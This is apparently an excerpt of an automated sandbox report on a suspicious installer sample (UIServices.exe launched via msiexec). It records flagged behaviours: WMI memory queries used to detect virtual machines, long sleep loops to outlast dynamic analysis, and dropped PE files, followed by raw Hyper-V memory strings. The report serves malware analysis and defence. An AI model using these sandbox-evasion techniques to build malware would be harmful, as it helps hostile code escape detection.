Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\msiexec.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory
Source: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_CacheMemory

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\loaddll64.exe TID: 2092

Thread sleep time: -120000s >= -30000s

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1F4D.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSIECF4.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\expand.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp	Jump to dropped file

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe

API coverage: 3.3 %

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\loaddll64.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\expand.exe	File Volume queried: C:\ FullSizeInformation

Source: UIServices.exe, 00000039.00000002.456255231.0000018E5A610000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Proce
Source: UIServices.exe, 00000027.00000003.323791092.0000029C1E26F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: erminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service y.a
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Hypervisorw
Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Virtual Machine Bus Provider Pipesz
Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor)urQ
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Virtual Machine Bus Pipes
Source: UIServices.exe, 00000039.00000003.451814280.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455773561.0000018E58758000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partitiono
Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes`
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider PipesJp
Source: UIServices.exe, 00000027.00000002.342987817.0000029C1E28F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: hannel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M
Source: UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service1B
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V umvqqnfqcihjvfn Bus Pipes
Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration ServiceXulQ
Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: DHyper-V Hypervisor Root Partition c
Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service\|y
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Hypervisor Root Partition
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: THyper-V Hypervisor Root Virtual ProcessorU
Source: UIServices.exe, 00000027.00000003.330989782.0000029C1E81D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.388069548.0000027DB7434000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.444621633.0000018E5AC46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq
Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Dynamic Memory Integration Service/
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service
Source: UIServices.exe, 00000039.00000003.437083705.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436830567.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.436514987.0000018E5A611000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: % Idle Time5280Total Interrupts/sec5182Hyper-V Hyperviso
Source: UIServices.exe, 00000039.00000002.456580327.0000018E5A66F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec5218Inter-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended
Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336607466.0000029C1EB23000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342553796.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.340825483.0000029C1C584000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V Virtual Machine Bus Pipes
Source: UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VHyper-V Dynamic Memory Integration Service!
Source: UIServices.exe, 00000027.00000003.325370471.0000029C1E244000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401935244.0000027DB6E34000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 8258RemoteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average Workflow Load Time7362Average Workflow Load Time Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec
Source: UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: JHyper-V Hypervisor Logical Processor
Source: UIServices.exe, 00000027.00000003.323667575.0000029C1E251000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.437051619.0000018E5A626000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: oteFX Synth3D VSC VM Transport Channel8260Number of space available signals received8262Number of space available signals received per second8264Number of data available signals received8266Number of data available signals received per second8268Number of space available signals sent8270Number of space available signals sent per second8272Number of data available signals sent8274Number of data available signals sent per second8276Number of data available event was reset8278Number of data available event was reset per second8280Number of space available event was reset8282Number of space available event was reset per second8244RemoteFX Synth3D VSC VM Device8246Number of created VMT channels8248Number of waiting VMT channels8250Number of connected VMT channels8252Number of disconnected VMT channels8254Total number of created VMT channels8256Number of RDVGM restarted notifications7320WorkflowServiceHost 4.0.0.07322Workflows Created7324Workflows Created Per Second7326Workflows Executing7328Workflows Completed7330Workflows Completed Per Second7332Workflows Aborted7334Workflows Aborted Per Second7336Workflows In Memory7338Workflows Persisted7340Workflows Persisted Per Second7342Workflows Terminated7344Workflows Terminated Per Second7346Workflows Loaded7348Workflows Loaded Per Second7350Workflows Unloaded7352Workflows Unloaded Per Second7354Workflows Suspended7356Workflows Suspended Per Second7358Workflows Idle Per Second7360Average 